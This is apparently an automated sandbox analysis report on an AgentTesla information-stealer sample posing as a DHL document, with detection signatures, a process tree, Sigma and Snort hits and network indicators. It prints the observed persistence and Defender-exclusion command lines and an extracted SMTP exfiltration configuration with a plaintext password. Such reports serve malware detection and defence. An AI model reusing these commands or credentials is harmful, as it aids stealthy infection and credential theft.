Edit tour

Windows Analysis Report
DHL DETAILS.exe

Overview

General Information

Sample name:	DHL DETAILS.exe
Analysis ID:	1405882
MD5:	0603858e620614e6badc889156f4f868
SHA1:	9e3a8d66b1a788b262f047fc0e13830292911d5b
SHA256:	922d60e40972c644ff506ce7475a18636afa17abdad800cfaf9fbc413a742e76
Tags:	DHLexe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AgentTesla

Adds a directory exclusion to Windows Defender

Connects to many IPs within the same subnet mask (likely port scanning)

Connects to many ports of the same IP (likely port scanning)

Creates multiple autostart registry keys

Disables UAC (registry)

Drops PE files with benign system names

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspect Svchost Activity

Sigma detected: Suspicious Epmap Connection

Sigma detected: System File Execution Location Anomaly

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Connects to several IPs in different countries

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Destination Ports

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Uncommon Svchost Parent Process

Tries to load missing DLLs

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

DHL DETAILS.exe (PID: 6352 cmdline: C:\Users\user\Desktop\DHL DETAILS.exe MD5: 0603858E620614E6BADC889156F4F868)

cmd.exe (PID: 43096 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 43104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 43160 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 43112 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 43144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 43200 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)

svchost.exe (PID: 43312 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 0603858E620614E6BADC889156F4F868)

powershell.exe (PID: 47872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 48908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AddInProcess32.exe (PID: 49664 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: 9827FF3CDF4B83F9C86354606736CA9C)

MSBuild.exe (PID: 45052 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 48800 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 56404 cmdline: C:\Windows\system32\WerFault.exe -u -p 43312 -s 155960 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 1536 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 43220 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 0603858E620614E6BADC889156F4F868)

svchost.exe (PID: 56176 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 0603858E620614E6BADC889156F4F868)

powershell.exe (PID: 61576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 63200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 63312 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

MSBuild.exe (PID: 65524 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 26228 cmdline: C:\Windows\system32\WerFault.exe -u -p 56176 -s 44056 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 50096 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 51172 cmdline: C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 69436 cmdline: C:\Windows\system32\WerFault.exe -pss -s 484 -p 56176 -ip 56176 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 62400 cmdline: C:\Windows\system32\WerFault.exe -pss -s 544 -p 43080 -ip 43080 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

svchost.exe (PID: 43080 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 0603858E620614E6BADC889156F4F868)

powershell.exe (PID: 62300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 62308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

CasPol.exe (PID: 62324 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 62332 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)

WerFault.exe (PID: 62652 cmdline: C:\Windows\system32\WerFault.exe -u -p 43080 -s 96472 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

VHFSQv.exe (PID: 82112 cmdline: "C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

conhost.exe (PID: 82140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

VHFSQv.exe (PID: 80676 cmdline: "C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

conhost.exe (PID: 48136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "terminal7.veeblehosting.com", "Username": "itumpa@dhanyagruop.com", "Password": "mission11.."}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000010.00000002.2800783288.0000000002F40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000010.00000002.2800783288.0000000002F6B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: MSBuild.exe PID: 45052	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 45052	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.MSBuild.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.MSBuild.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
16.2.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33910:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33982:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33a0c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33a9e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33b08:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33b7a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33c10:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33ca0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 56176, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe, ProcessId: 63312, ProcessName: RegAsm.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\DHL DETAILS.exe, ProcessId: 6352, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\DHL DETAILS.exe, ParentImage: C:\Users\user\Desktop\DHL DETAILS.exe, ParentProcessId: 6352, ParentProcessName: DHL DETAILS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 43096, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Source: Network Connection

Author: Markus Neis: Data: DestinationIp: 170.150.159.18, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\DHL DETAILS.exe, Initiated: true, ProcessId: 6352, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50435

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 189.161.3.231, DestinationIsIpv6: false, DestinationPort: 10101, EventID: 3, Image: C:\Users\user\Desktop\DHL DETAILS.exe, Initiated: true, ProcessId: 6352, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50159

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 43312, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 47872, ProcessName: powershell.exe

Sigma detected: Suspect Svchost Activity

Source: Process started

Author: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 43220, ProcessName: svchost.exe

Sigma detected: Suspicious Epmap Connection

Source: Network Connection

Author: frack113, Tim Shelton (fps): Data: DestinationIp: 8.213.137.155, DestinationIsIpv6: false, DestinationPort: 135, EventID: 3, Image: C:\Users\user\Desktop\DHL DETAILS.exe, Initiated: true, ProcessId: 6352, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 50882

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 43220, ProcessName: svchost.exe

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 154.73.29.1, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\DHL DETAILS.exe, Initiated: true, ProcessId: 6352, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49710

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL DETAILS.exe, ProcessId: 6352, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.56.136.50, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: , Initiated: true, ProcessId: , Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 63794

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 43096, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 43160, ProcessName: schtasks.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 43112, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 43312, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 43312, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force, ProcessId: 47872, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1536, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\DHL DETAILS.exe, ParentImage: C:\Users\user\Desktop\DHL DETAILS.exe, ParentProcessId: 6352, ParentProcessName: DHL DETAILS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 43096, ProcessName: cmd.exe

Snort Signatures

ETPRO TROJAN Observed Hello2Malware Domain in TLS SNI - Source IP: 192.168.2.5 - Destination IP: 172.67.140.87

Timestamp:	03/09/24-13:14:13.915824
SID:	2856466
Source Port:	51523
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Observed Hello2Malware Domain in TLS SNI - Source IP: 192.168.2.5 - Destination IP: 172.67.140.87

Timestamp:	03/09/24-13:14:13.916003
SID:	2856466
Source Port:	51524
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN DNS Query to Hello2Malware Domain - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	03/09/24-13:14:13.728269
SID:	2856463
Source Port:	60774
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 16.2.MSBuild.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "terminal7.veeblehosting.com", "Username": "itumpa@dhanyagruop.com", "Password": "mission11.."}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\svchost.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\svchost.exe	Virustotal: Detection: 35%			Perma Link

Multi AV Scanner detection for submitted file

Source: DHL DETAILS.exe	ReversingLabs: Detection: 52%
Source: DHL DETAILS.exe	Virustotal: Detection: 35%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\svchost.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: DHL DETAILS.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:51523 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:51524 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:53536 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:53639 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:55292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:55293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:57177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:57178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:59163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:59424 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.5:60799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:63279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.5:63403 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:49207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:49301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:56165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:62819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:63576 version: TLS 1.2

Source: DHL DETAILS.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Xml.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Net.Http.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1829.tmp.dmp.40.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Configuration.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Xml.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER1829.tmp.dmp.40.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Core.ni.pdb source: WER1829.tmp.dmp.40.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER1829.tmp.dmp.40.dr
